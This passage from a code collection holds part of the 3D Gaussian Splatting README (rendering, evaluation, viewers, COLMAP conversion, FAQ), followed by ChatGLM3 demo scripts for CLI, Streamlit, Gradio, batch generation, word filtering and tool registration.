models](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/datasets/pretrained/models.zip), you will have to download the corresponding source data sets and indicate their location to ```render.py``` with an additional ```--source_path/-s``` flag. Note: The pre-trained models were created with the release codebase. This code base has been cleaned up and includes bugfixes, hence the metrics you get from evaluating them will differ from those in the paper. ```shell python render.py -m <path to pre-trained model> -s <path to COLMAP dataset> python metrics.py -m <path to pre-trained model> ``` <details> <summary><span style="font-weight: bold;">Command Line Arguments for render.py</span></summary> #### --model_path / -m Path to the trained model directory you want to create renderings for. #### --skip_train Flag to skip rendering the training set. #### --skip_test Flag to skip rendering the test set. #### --quiet Flag to omit any text written to standard out pipe. **The below parameters will be read automatically from the model path, based on what was used for training. However, you may override them by providing them explicitly on the command line.** #### --source_path / -s Path to the source directory containing a COLMAP or Synthetic NeRF data set. #### --images / -i Alternative subdirectory for COLMAP images (```images``` by default). #### --eval Add this flag to use a MipNeRF360-style training/test split for evaluation. #### --resolution / -r Changes the resolution of the loaded images before training. If provided ```1, 2, 4``` or ```8```, uses original, 1/2, 1/4 or 1/8 resolution, respectively. For all other values, rescales the width to the given number while maintaining image aspect. ```1``` by default. #### --white_background / -w Add this flag to use white background instead of black (default), e.g., for evaluation of NeRF Synthetic dataset. #### --convert_SHs_python Flag to make pipeline render with computed SHs from PyTorch instead of ours. #### --convert_cov3D_python Flag to make pipeline render with computed 3D covariance from PyTorch instead of ours. 
</details> <details> <summary><span style="font-weight: bold;">Command Line Arguments for metrics.py</span></summary> #### --model_paths / -m Space-separated list of model paths for which metrics should be computed. </details> <br> We further provide the ```full_eval.py``` script. This script specifies the routine used in our evaluation and demonstrates the use of some additional parameters, e.g., ```--images (-i)``` to define alternative image directories within COLMAP data sets. If you have downloaded and extracted all the training data, you can run it like this: ```shell python full_eval.py -m360 <mipnerf360 folder> -tat <tanks and temples folder> -db <deep blending folder> ``` In the current version, this process takes about 7h on our reference machine containing an A6000. If you want to do the full evaluation on our pre-trained models, you can specify their download location and skip training. ```shell python full_eval.py -o <directory with pretrained models> --skip_training -m360 <mipnerf360 folder> -tat <tanks and temples folder> -db <deep blending folder> ``` If you want to compute the metrics on our paper's [evaluation images](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/evaluation/images.zip), you can also skip rendering. In this case it is not necessary to provide the source datasets. You can compute metrics for multiple image sets at a time. ```shell python full_eval.py -m <directory with evaluation images>/garden ... --skip_training --skip_rendering ``` <details> <summary><span style="font-weight: bold;">Command Line Arguments for full_eval.py</span></summary> #### --skip_training Flag to skip training stage. #### --skip_rendering Flag to skip rendering stage. #### --skip_metrics Flag to skip metrics calculation stage. #### --output_path Directory to put renderings and results in, ```./eval``` by default, set to pre-trained model location if evaluating them. #### --mipnerf360 / -m360 Path to MipNeRF360 source datasets, required if training or rendering. #### --tanksandtemples / -tat Path to Tanks&Temples source datasets, required if training or rendering. #### --deepblending / -db Path to Deep Blending source datasets, required if training or rendering. </details> <br> ## Interactive Viewers We provide two interactive viewers for our method: remote and real-time. Our viewing solutions are based on the [SIBR](https://sibr.gitlabpages.inria.fr/) framework, developed by the GRAPHDECO group for several novel-view synthesis projects. ### Hardware Requirements - OpenGL 4.5-ready GPU and drivers (or latest MESA software) - 4 GB VRAM recommended - CUDA-ready GPU with Compute Capability 7.0+ (only for Real-Time Viewer) ### Software Requirements - Visual Studio or g++, **not Clang** (we used Visual Studio 2019 for Windows) - CUDA SDK 11, install *after* Visual Studio (we used 11.8) - CMake (recent version, we used 3.24) - 7zip (only on Windows) ### Pre-built Windows Binaries We provide pre-built binaries for Windows [here](https://repo-sam.inria.fr/fungraph/3d-gaussian-splatting/binaries/viewers.zip). We recommend using them on Windows for an efficient setup, since the building of SIBR involves several external dependencies that must be downloaded and compiled on-the-fly. ### Installation from Source If you cloned with submodules (e.g., using ```--recursive```), the source code for the viewers is found in ```SIBR_viewers```. The network viewer runs within the SIBR framework for Image-based Rendering applications. #### Windows CMake should take care of your dependencies. 
```shell cd SIBR_viewers cmake -Bbuild . cmake --build build --target install --config RelWithDebInfo ``` You may specify a different configuration, e.g. ```Debug``` if you need more control during development. #### Ubuntu 22.04 You will need to install a few dependencies before running the project setup. ```shell # Dependencies sudo apt install -y libglew-dev libassimp-dev libboost-all-dev libgtk-3-dev libopencv-dev libglfw3-dev libavdevice-dev libavcodec-dev libeigen3-dev libxxf86vm-dev libembree-dev # Project setup cd SIBR_viewers cmake -Bbuild . -DCMAKE_BUILD_TYPE=Release # add -G Ninja to build faster cmake --build build -j24 --target install ``` #### Ubuntu 20.04 Backwards compatibility with Focal Fossa is not fully tested, but building SIBR with CMake should still work after invoking ```shell git checkout fossa_compatibility ``` ### Navigation in SIBR Viewers The SIBR interface provides several methods of navigating the scene. By default, you will be started with an FPS navigator, which you can control with ```W, A, S, D, Q, E``` for camera translation and ```I, K, J, L, U, O``` for rotation. Alternatively, you may want to use a Trackball-style navigator (select from the floating menu). You can also snap to a camera from the data set with the ```Snap to``` button or find the closest camera with ```Snap to closest```. The floating menues also allow you to change the navigation speed. You can use the ```Scaling Modifier``` to control the size of the displayed Gaussians, or show the initial point cloud. ### Running the Network Viewer https://github.com/graphdeco-inria/gaussian-splatting/assets/40643808/90a2e4d3-cf2e-4633-b35f-bfe284e28ff7 After extracting or installing the viewers, you may run the compiled ```SIBR_remoteGaussian_app[_config]``` app in ```<SIBR install dir>/bin```, e.g.: ```shell ./<SIBR install dir>/bin/SIBR_remoteGaussian_app ``` The network viewer allows you to connect to a running training process on the same or a different machine. If you are training on the same machine and OS, no command line parameters should be required: the optimizer communicates the location of the training data to the network viewer. By default, optimizer and network viewer will try to establish a connection on **localhost** on port **6009**. You can change this behavior by providing matching ```--ip``` and ```--port``` parameters to both the optimizer and the network viewer. If for some reason the path used by the optimizer to find the training data is not reachable by the network viewer (e.g., due to them running on different (virtual) machines), you may specify an override location to the viewer by using ```-s <source path>```. <details> <summary><span style="font-weight: bold;">Primary Command Line Arguments for Network Viewer</span></summary> #### --path / -s Argument to override model's path to source dataset. #### --ip IP to use for connection to a running training script. #### --port Port to use for connection to a running training script. #### --rendering-size Takes two space separated numbers to define the resolution at which network rendering occurs, ```1200``` width by default. Note that to enforce an aspect that differs from the input images, you need ```--force-aspect-ratio``` too. #### --load_images Flag to load source dataset images to be displayed in the top view for each camera. 
</details> <br> ### Running the Real-Time Viewer https://github.com/graphdeco-inria/gaussian-splatting/assets/40643808/0940547f-1d82-4c2f-a616-44eabbf0f816 After extracting or installing the viewers, you may run the compiled ```SIBR_gaussianViewer_app[_config]``` app in ```<SIBR install dir>/bin```, e.g.: ```shell ./<SIBR install dir>/bin/SIBR_gaussianViewer_app -m <path to trained model> ``` It should suffice to provide the ```-m``` parameter pointing to a trained model directory. Alternatively, you can specify an override location for training input data using ```-s```. To use a specific resolution other than the auto-chosen one, specify ```--rendering-size <width> <height>```. Combine it with ```--force-aspect-ratio``` if you want the exact resolution and don't mind image distortion. **To unlock the full frame rate, please disable V-Sync on your machine and also in the application (Menu &rarr; Display). In a multi-GPU system (e.g., laptop) your OpenGL/Display GPU should be the same as your CUDA GPU (e.g., by setting the application's GPU preference on Windows, see below) for maximum performance.** ![Teaser image](assets/select.png) In addition to the initial point cloud and the splats, you also have the option to visualize the Gaussians by rendering them as ellipsoids from the floating menu. SIBR has many other functionalities, please see the [documentation](https://sibr.gitlabpages.inria.fr/) for more details on the viewer, navigation options etc. There is also a Top View (available from the menu) that shows the placement of the input cameras and the original SfM point cloud; please note that Top View slows rendering when enabled. The real-time viewer also uses slightly more aggressive, fast culling, which can be toggled in the floating menu. If you ever encounter an issue that can be solved by turning fast culling off, please let us know. <details> <summary><span style="font-weight: bold;">Primary Command Line Arguments for Real-Time Viewer</span></summary> #### --model-path / -m Path to trained model. #### --iteration Specifies which of state to load if multiple are available. Defaults to latest available iteration. #### --path / -s Argument to override model's path to source dataset. #### --rendering-size Takes two space separated numbers to define the resolution at which real-time rendering occurs, ```1200``` width by default. Note that to enforce an aspect that differs from the input images, you need ```--force-aspect-ratio``` too. #### --load_images Flag to load source dataset images to be displayed in the top view for each camera. #### --device Index of CUDA device to use for rasterization if multiple are available, ```0``` by default. #### --no_interop Disables CUDA/GL interop forcibly. Use on systems that may not behave according to spec (e.g., WSL2 with MESA GL 4.5 software rendering). </details> <br> ## Processing your own Scenes Our COLMAP loaders expect the following dataset structure in the source path location: ``` <location> |---images | |---<image 0> | |---<image 1> | |---... |---sparse |---0 |---cameras.bin |---images.bin |---points3D.bin ``` For rasterization, the camera models must be either a SIMPLE_PINHOLE or PINHOLE camera. We provide a converter script ```convert.py```, to extract undistorted images and SfM information from input images. Optionally, you can use ImageMagick to resize the undistorted images. This rescaling is similar to MipNeRF360, i.e., it creates images with 1/2, 1/4 and 1/8 the original resolution in corresponding folders. 
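The loaders are strict about this layout, so a quick check before training can save a failed run. The snippet below is a hypothetical helper (not part of the repository; the example path is made up) that verifies the files listed in the structure above are present:

```python
# Hypothetical sanity check for the COLMAP layout expected by the loaders.
from pathlib import Path

def check_colmap_layout(location: str) -> bool:
    root = Path(location)
    required = [
        root / "images",
        root / "sparse" / "0" / "cameras.bin",
        root / "sparse" / "0" / "images.bin",
        root / "sparse" / "0" / "points3D.bin",
    ]
    missing = [p for p in required if not p.exists()]
    for p in missing:
        print(f"missing: {p}")
    return not missing

# e.g. check_colmap_layout("/data/my_scene") before running train.py -s /data/my_scene
```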
To use them, please first install a recent version of COLMAP (ideally CUDA-powered) and ImageMagick. Put the images you want to use in a directory ```<location>/input```. ``` <location> |---input |---<image 0> |---<image 1> |---... ``` If you have COLMAP and ImageMagick on your system path, you can simply run ```shell python convert.py -s <location> [--resize] #If not resizing, ImageMagick is not needed ``` Alternatively, you can use the optional parameters ```--colmap_executable``` and ```--magick_executable``` to point to the respective paths. Please note that on Windows, the executable should point to the COLMAP ```.bat``` file that takes care of setting the execution environment. Once done, ```<location>``` will contain the expected COLMAP data set structure with undistorted, resized input images, in addition to your original images and some temporary (distorted) data in the directory ```distorted```. If you have your own COLMAP dataset without undistortion (e.g., using ```OPENCV``` camera), you can try to just run the last part of the script: Put the images in ```input``` and the COLMAP info in a subdirectory ```distorted```: ``` <location> |---input | |---<image 0> | |---<image 1> | |---... |---distorted |---database.db |---sparse |---0 |---... ``` Then run ```shell python convert.py -s <location> --skip_matching [--resize] #If not resizing, ImageMagick is not needed ``` <details> <summary><span style="font-weight: bold;">Command Line Arguments for convert.py</span></summary> #### --no_gpu Flag to avoid using GPU in COLMAP. #### --skip_matching Flag to indicate that COLMAP info is available for images. #### --source_path / -s Location of the inputs. #### --camera Which camera model to use for the early matching steps, ```OPENCV``` by default. #### --resize Flag for creating resized versions of input images. #### --colmap_executable Path to the COLMAP executable (```.bat``` on Windows). #### --magick_executable Path to the ImageMagick executable. </details> <br> ### OpenXR support OpenXR is supported in the branch gaussian_code_release_openxr Within that branch, you can find documentation for VR support [here](https://gitlab.inria.fr/sibr/sibr_core/-/tree/gaussian_code_release_openxr?ref_type=heads). ## FAQ - *Where do I get data sets, e.g., those referenced in ```full_eval.py```?* The MipNeRF360 data set is provided by the authors of the original paper on the project site. Note that two of the data sets cannot be openly shared and require you to consult the authors directly. For Tanks&Temples and Deep Blending, please use the download links provided at the top of the page. Alternatively, you may access the cloned data (status: August 2023!) from [HuggingFace](https://huggingface.co/camenduru/gaussian-splatting) - *How can I use this for a much larger dataset, like a city district?* The current method was not designed for these, but given enough memory, it should work out. However, the approach can struggle in multi-scale detail scenes (extreme close-ups, mixed with far-away shots). This is usually the case in, e.g., driving data sets (cars close up, buildings far away). For such scenes, you can lower the ```--position_lr_init```, ```--position_lr_final``` and ```--scaling_lr``` (x0.3, x0.1, ...). The more extensive the scene, the lower these values should be. Below, we use default learning rates (left) and ```--position_lr_init 0.000016 --scaling_lr 0.001"``` (right). 
| ![Default learning rate result](assets/worse.png "title-1") <!-- --> | <!-- --> ![Reduced learning rate result](assets/better.png "title-2") |
| --- | --- |

- *I'm on Windows and I can't manage to build the submodules, what do I do?* Consider following the steps in the excellent video tutorial [here](https://www.youtube.com/watch?v=UXtuigy_wYc); hopefully they will help. The order in which the steps are done is important! Alternatively, consider using the linked Colab template.

- *It still doesn't work. It says something about ```cl.exe```. What do I do?* User Henry Pearce found a workaround. You can try adding the Visual Studio path to your environment variables (your version number might differ):
```C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64```
Then make sure you start a new conda prompt, cd to your repo location, and try this:
```
conda activate gaussian_splatting
cd <dir_to_repo>/gaussian-splatting
pip install submodules\diff-gaussian-rasterization
pip install submodules\simple-knn
```

- *I'm on macOS/Puppy Linux/Greenhat and I can't manage to build, what do I do?* Sorry, we can't provide support for platforms outside of the ones we list in this README. Consider using the linked Colab template.

- *I don't have 24 GB of VRAM for training, what do I do?* The VRAM consumption is determined by the number of points that are being optimized, which increases over time. If you only want to train to 7k iterations, you will need significantly less. To do the full training routine and avoid running out of memory, you can increase the ```--densify_grad_threshold```, ```--densification_interval``` or reduce the value of ```--densify_until_iter```. Note however that this will affect the quality of the result. Also try setting ```--test_iterations``` to ```-1``` to avoid memory spikes during testing. If ```--densify_grad_threshold``` is very high, no densification should occur and training should complete if the scene itself loads successfully (see the short sketch after this FAQ for how these flags feed the densify/prune decision).

- *24 GB of VRAM for reference quality training is still a lot! Can't we do it with less?* Yes, most likely. By our calculations it should be possible with **way** less memory (~8 GB). If we can find the time we will try to achieve this. If some PyTorch veteran out there wants to tackle this, we look forward to your pull request!

- *How can I use the differentiable Gaussian rasterizer for my own project?* Easy, it is included in this repo as the submodule ```diff-gaussian-rasterization```. Feel free to check out and install the package. It's not really documented, but using it from the Python side is very straightforward (cf. ```gaussian_renderer/__init__.py```).

- *Wait, but ```<insert feature>``` isn't optimized and could be much better?* There are several parts we didn't even have time to think about improving (yet). The performance you get with this prototype is probably a rather slow baseline for what is physically possible.

- *Something is broken, how did this happen?* We tried hard to provide a solid and comprehensible basis to make use of the paper's method. We have refactored the code quite a bit, but we have limited capacity to test all possible usage scenarios. Thus, if part of the website, the code or the performance is lacking, please create an issue. If we find the time, we will do our best to address it.
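To make the VRAM-related flags from the FAQ above a little more concrete: the toy sketch below (illustrative only, assuming PyTorch and made-up numbers) mirrors how `GaussianModel.densify_and_prune` in `scene/gaussian_model.py` turns accumulated view-space gradients and opacities into densification and pruning masks. Raising ```--densify_grad_threshold``` shrinks the densification mask and therefore the point count and memory footprint.

```python
# Toy illustration of the masks built in GaussianModel.densify_and_prune.
import torch

# Accumulated view-space gradient magnitudes and observation counts per Gaussian.
xyz_gradient_accum = torch.tensor([[0.0010], [0.0300], [0.0000]])
denom = torch.tensor([[10.0], [10.0], [0.0]])

grads = xyz_gradient_accum / denom
grads[grads.isnan()] = 0.0                    # Gaussians never observed get zero gradient

max_grad = 0.0002                             # --densify_grad_threshold
densify_mask = torch.norm(grads, dim=-1) >= max_grad   # clone/split candidates

opacity = torch.tensor([0.9, 0.002, 0.5])
min_opacity = 0.005
prune_mask = opacity < min_opacity            # nearly transparent Gaussians are removed

print(densify_mask)  # tensor([False,  True, False])
print(prune_mask)    # tensor([False,  True, False])
```

In the real code, the densification candidates are further split into "clone" (small Gaussians) and "split" (large Gaussians) based on their scaling relative to ```--percent_dense``` times the scene extent, and overly large or screen-filling Gaussians are additionally pruned.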
ChatGLM3
045be71ff8df03b8819a6560866c9a86ec9be363
File: basic_demo/cli_demo.py import os import platform from transformers import AutoTokenizer, AutoModel MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() # add .quantize(bits=4, device="cuda").cuda() before .eval() to use int4 model # must use cuda to load int4 model os_name = platform.system() clear_command = 'cls' if os_name == 'Windows' else 'clear' stop_stream = False welcome_prompt = "欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序" def build_prompt(history): prompt = welcome_prompt for query, response in history: prompt += f"\n\n用户:{query}" prompt += f"\n\nChatGLM3-6B:{response}" return prompt def main(): past_key_values, history = None, [] global stop_stream print(welcome_prompt) while True: query = input("\n用户:") if query.strip() == "stop": break if query.strip() == "clear": past_key_values, history = None, [] os.system(clear_command) print(welcome_prompt) continue print("\nChatGLM:", end="") current_length = 0 for response, history, past_key_values in model.stream_chat(tokenizer, query, history=history, top_p=1, temperature=0.01, past_key_values=past_key_values, return_past_key_values=True): if stop_stream: stop_stream = False break else: print(response[current_length:], end="", flush=True) current_length = len(response) print("") if __name__ == "__main__": main() File: basic_demo/web_demo_streamlit.py """ This script is a simple web demo based on Streamlit, showcasing the use of the ChatGLM3-6B model. For a more comprehensive web demo, it is recommended to use 'composite_demo'. Usage: - Run the script using Streamlit: `streamlit run web_demo_streamlit.py` - Adjust the model parameters from the sidebar. - Enter questions in the chat input box and interact with the ChatGLM3-6B model. Note: Ensure 'streamlit' and 'transformers' libraries are installed and the required model checkpoints are available. 
""" import os import streamlit as st import torch from transformers import AutoModel, AutoTokenizer MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) st.set_page_config( page_title="ChatGLM3-6B Streamlit Simple Demo", page_icon=":robot:", layout="wide" ) @st.cache_resource def get_model(): tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() return tokenizer, model # 加载Chatglm3的model和tokenizer tokenizer, model = get_model() if "history" not in st.session_state: st.session_state.history = [] if "past_key_values" not in st.session_state: st.session_state.past_key_values = None max_length = st.sidebar.slider("max_length", 0, 32768, 8192, step=1) top_p = st.sidebar.slider("top_p", 0.0, 1.0, 0.8, step=0.01) temperature = st.sidebar.slider("temperature", 0.0, 1.0, 0.6, step=0.01) buttonClean = st.sidebar.button("清理会话历史", key="clean") if buttonClean: st.session_state.history = [] st.session_state.past_key_values = None if torch.cuda.is_available(): torch.cuda.empty_cache() st.rerun() for i, message in enumerate(st.session_state.history): if message["role"] == "user": with st.chat_message(name="user", avatar="user"): st.markdown(message["content"]) else: with st.chat_message(name="assistant", avatar="assistant"): st.markdown(message["content"]) with st.chat_message(name="user", avatar="user"): input_placeholder = st.empty() with st.chat_message(name="assistant", avatar="assistant"): message_placeholder = st.empty() prompt_text = st.chat_input("请输入您的问题") if prompt_text: input_placeholder.markdown(prompt_text) history = st.session_state.history past_key_values = st.session_state.past_key_values for response, history, past_key_values in model.stream_chat( tokenizer, prompt_text, history, past_key_values=past_key_values, max_length=max_length, top_p=top_p, temperature=temperature, return_past_key_values=True, ): message_placeholder.markdown(response) st.session_state.history = history st.session_state.past_key_values = past_key_values File: basic_demo/cli_demo_bad_word_ids.py """ This script demonstrates how to use the `bad_words_ids` argument in the context of a conversational AI model to filter out unwanted words or phrases from the model's responses. It's designed to showcase a fundamental method of content moderation within AI-generated text, particularly useful in scenarios where maintaining the decorum of the conversation is essential. Usage: - Interact with the model by typing queries. The model will generate responses while avoiding the specified bad words. - Use 'clear' to clear the conversation history and 'stop' to exit the program. Requirements: - The script requires the Transformers library and an appropriate model checkpoint. Note: The `bad_words_ids` feature is an essential tool for controlling the output of language models, particularly in user-facing applications where content moderation is crucial. 
""" import os import platform from transformers import AutoTokenizer, AutoModel MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() os_name = platform.system() clear_command = 'cls' if os_name == 'Windows' else 'clear' stop_stream = False welcome_prompt = "欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序" # probability tensor contains either `inf`, `nan` or element < 0 bad_words = ["你好", "ChatGLM"] bad_word_ids = [tokenizer.encode(bad_word, add_special_tokens=False) for bad_word in bad_words] def build_prompt(history): prompt = welcome_prompt for query, response in history: prompt += f"\n\n用户:{query}" prompt += f"\n\nChatGLM3-6B:{response}" return prompt def main(): past_key_values, history = None, [] global stop_stream print(welcome_prompt) while True: query = input("\n用户:") if query.strip().lower() == "stop": break if query.strip().lower() == "clear": past_key_values, history = None, [] os.system(clear_command) print(welcome_prompt) continue # Attempt to generate a response try: print("\nChatGLM:", end="") current_length = 0 response_generated = False for response, history, past_key_values in model.stream_chat( tokenizer, query, history=history, top_p=1, temperature=0.01, past_key_values=past_key_values, return_past_key_values=True, bad_words_ids=bad_word_ids # assuming this is implemented correctly ): response_generated = True # Check if the response contains any bad words if any(bad_word in response for bad_word in bad_words): print("我的回答涉嫌了 bad word") break # Break the loop if a bad word is detected # Otherwise, print the generated response print(response[current_length:], end="", flush=True) current_length = len(response) if not response_generated: print("没有生成任何回答。") except RuntimeError as e: print(f"生成文本时发生错误:{e},这可能是涉及到设定的敏感词汇") print("") if __name__ == "__main__": main() File: basic_demo/web_demo_gradio.py """ This script creates an interactive web demo for the ChatGLM3-6B model using Gradio, a Python library for building quick and easy UI components for machine learning models. It's designed to showcase the capabilities of the ChatGLM3-6B model in a user-friendly interface, allowing users to interact with the model through a chat-like interface. Usage: - Run the script to start the Gradio web server. - Interact with the model by typing questions and receiving responses. Requirements: - Gradio (required for 4.13.0 and later, 3.x is not support now) should be installed. Note: The script includes a modification to the Chatbot's postprocess method to handle markdown to HTML conversion, ensuring that the chat interface displays formatted text correctly. 
""" import os import gradio as gr import torch from threading import Thread from typing import Union, Annotated from pathlib import Path from peft import AutoPeftModelForCausalLM, PeftModelForCausalLM from transformers import ( AutoModelForCausalLM, AutoTokenizer, PreTrainedModel, PreTrainedTokenizer, PreTrainedTokenizerFast, StoppingCriteria, StoppingCriteriaList, TextIteratorStreamer ) ModelType = Union[PreTrainedModel, PeftModelForCausalLM] TokenizerType = Union[PreTrainedTokenizer, PreTrainedTokenizerFast] MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) def _resolve_path(path: Union[str, Path]) -> Path: return Path(path).expanduser().resolve() def load_model_and_tokenizer( model_dir: Union[str, Path], trust_remote_code: bool = True ) -> tuple[ModelType, TokenizerType]: model_dir = _resolve_path(model_dir) if (model_dir / 'adapter_config.json').exists(): model = AutoPeftModelForCausalLM.from_pretrained( model_dir, trust_remote_code=trust_remote_code, device_map='auto' ) tokenizer_dir = model.peft_config['default'].base_model_name_or_path else: model = AutoModelForCausalLM.from_pretrained( model_dir, trust_remote_code=trust_remote_code, device_map='auto' ) tokenizer_dir = model_dir tokenizer = AutoTokenizer.from_pretrained( tokenizer_dir, trust_remote_code=trust_remote_code ) return model, tokenizer model, tokenizer = load_model_and_tokenizer(MODEL_PATH, trust_remote_code=True) class StopOnTokens(StoppingCriteria): def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs) -> bool: stop_ids = [0, 2] for stop_id in stop_ids: if input_ids[0][-1] == stop_id: return True return False def parse_text(text): lines = text.split("\n") lines = [line for line in lines if line != ""] count = 0 for i, line in enumerate(lines): if "```" in line: count += 1 items = line.split('`') if count % 2 == 1: lines[i] = f'<pre><code class="language-{items[-1]}">' else: lines[i] = f'<br></code></pre>' else: if i > 0: if count % 2 == 1: line = line.replace("`", "\`") line = line.replace("<", "&lt;") line = line.replace(">", "&gt;") line = line.replace(" ", "&nbsp;") line = line.replace("*", "&ast;") line = line.replace("_", "&lowbar;") line = line.replace("-", "&#45;") line = line.replace(".", "&#46;") line = line.replace("!", "&#33;") line = line.replace("(", "&#40;") line = line.replace(")", "&#41;") line = line.replace("$", "&#36;") lines[i] = "<br>" + line text = "".join(lines) return text def predict(history, max_length, top_p, temperature): stop = StopOnTokens() messages = [] for idx, (user_msg, model_msg) in enumerate(history): if idx == len(history) - 1 and not model_msg: messages.append({"role": "user", "content": user_msg}) break if user_msg: messages.append({"role": "user", "content": user_msg}) if model_msg: messages.append({"role": "assistant", "content": model_msg}) print("\n\n====conversation====\n", messages) model_inputs = tokenizer.apply_chat_template(messages, add_generation_prompt=True, tokenize=True, return_tensors="pt").to(next(model.parameters()).device) streamer = TextIteratorStreamer(tokenizer, timeout=60, skip_prompt=True, skip_special_tokens=True) generate_kwargs = { "input_ids": model_inputs, "streamer": streamer, "max_new_tokens": max_length, "do_sample": True, "top_p": top_p, "temperature": temperature, "stopping_criteria": StoppingCriteriaList([stop]), "repetition_penalty": 1.2, } t = Thread(target=model.generate, kwargs=generate_kwargs) t.start() for new_token in streamer: if 
new_token != '': history[-1][1] += new_token yield history with gr.Blocks() as demo: gr.HTML("""<h1 align="center">ChatGLM3-6B Gradio Simple Demo</h1>""") chatbot = gr.Chatbot() with gr.Row(): with gr.Column(scale=4): with gr.Column(scale=12): user_input = gr.Textbox(show_label=False, placeholder="Input...", lines=10, container=False) with gr.Column(min_width=32, scale=1): submitBtn = gr.Button("Submit") with gr.Column(scale=1): emptyBtn = gr.Button("Clear History") max_length = gr.Slider(0, 32768, value=8192, step=1.0, label="Maximum length", interactive=True) top_p = gr.Slider(0, 1, value=0.8, step=0.01, label="Top P", interactive=True) temperature = gr.Slider(0.01, 1, value=0.6, step=0.01, label="Temperature", interactive=True) def user(query, history): return "", history + [[parse_text(query), ""]] submitBtn.click(user, [user_input, chatbot], [user_input, chatbot], queue=False).then( predict, [chatbot, max_length, top_p, temperature], chatbot ) emptyBtn.click(lambda: None, None, chatbot, queue=False) demo.queue() demo.launch(server_name="127.0.0.1", server_port=7870, inbrowser=True, share=False) File: basic_demo/cli_batch_request_demo.py import os from typing import Optional, Union from transformers import AutoModel, AutoTokenizer, LogitsProcessorList MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() def batch( model, tokenizer, prompts: Union[str, list[str]], max_length: int = 8192, num_beams: int = 1, do_sample: bool = True, top_p: float = 0.8, temperature: float = 0.8, logits_processor: Optional[LogitsProcessorList] = LogitsProcessorList(), ): tokenizer.encode_special_tokens = True if isinstance(prompts, str): prompts = [prompts] batched_inputs = tokenizer(prompts, return_tensors="pt", padding="longest") batched_inputs = batched_inputs.to(model.device) eos_token_id = [ tokenizer.eos_token_id, tokenizer.get_command("<|user|>"), tokenizer.get_command("<|assistant|>"), ] gen_kwargs = { "max_length": max_length, "num_beams": num_beams, "do_sample": do_sample, "top_p": top_p, "temperature": temperature, "logits_processor": logits_processor, "eos_token_id": eos_token_id, } batched_outputs = model.generate(**batched_inputs, **gen_kwargs) batched_response = [] for input_ids, output_ids in zip(batched_inputs.input_ids, batched_outputs): decoded_text = tokenizer.decode(output_ids[len(input_ids):]) batched_response.append(decoded_text.strip()) return batched_response def main(batch_queries): gen_kwargs = { "max_length": 2048, "do_sample": True, "top_p": 0.8, "temperature": 0.8, "num_beams": 1, } batch_responses = batch(model, tokenizer, batch_queries, **gen_kwargs) return batch_responses if __name__ == "__main__": batch_queries = [ "<|user|>\n讲个故事\n<|assistant|>", "<|user|>\n讲个爱情故事\n<|assistant|>", "<|user|>\n讲个开心故事\n<|assistant|>", "<|user|>\n讲个睡前故事\n<|assistant|>", "<|user|>\n讲个励志的故事\n<|assistant|>", "<|user|>\n讲个少壮不努力的故事\n<|assistant|>", "<|user|>\n讲个青春校园恋爱故事\n<|assistant|>", "<|user|>\n讲个工作故事\n<|assistant|>", "<|user|>\n讲个旅游的故事\n<|assistant|>", ] batch_responses = main(batch_queries) for response in batch_responses: print("=" * 10) print(response) File: tools_using_demo/tool_register.py """ 这段代码是工具注册的部分,通过注册工具,让模型实现工具调用 """ import inspect import traceback from copy import deepcopy from pprint import pformat from types import GenericAlias 
from typing import get_origin, Annotated _TOOL_HOOKS = {} _TOOL_DESCRIPTIONS = {} def register_tool(func: callable): tool_name = func.__name__ tool_description = inspect.getdoc(func).strip() python_params = inspect.signature(func).parameters tool_params = [] for name, param in python_params.items(): annotation = param.annotation if annotation is inspect.Parameter.empty: raise TypeError(f"Parameter `{name}` missing type annotation") if get_origin(annotation) != Annotated: raise TypeError(f"Annotation type for `{name}` must be typing.Annotated") typ, (description, required) = annotation.__origin__, annotation.__metadata__ typ: str = str(typ) if isinstance(typ, GenericAlias) else typ.__name__ if not isinstance(description, str): raise TypeError(f"Description for `{name}` must be a string") if not isinstance(required, bool): raise TypeError(f"Required for `{name}` must be a bool") tool_params.append({ "name": name, "description": description, "type": typ, "required": required }) tool_def = { "name": tool_name, "description": tool_description, "params": tool_params } print("[registered tool] " + pformat(tool_def)) _TOOL_HOOKS[tool_name] = func _TOOL_DESCRIPTIONS[tool_name] = tool_def return func def dispatch_tool(tool_name: str, tool_params: dict) -> str: if tool_name not in _TOOL_HOOKS: return f"Tool `{tool_name}` not found. Please use a provided tool." tool_call = _TOOL_HOOKS[tool_name] try: ret = tool_call(**tool_params) except: ret = traceback.format_exc() return str(ret) def get_tools() -> dict: return deepcopy(_TOOL_DESCRIPTIONS) # tools Definitions @register_tool def random_number_generator( seed: Annotated[int, 'The random seed used by the generator', True], range: Annotated[tuple[int, int], 'The range of the generated numbers', True], ) -> int: """ Generates a random 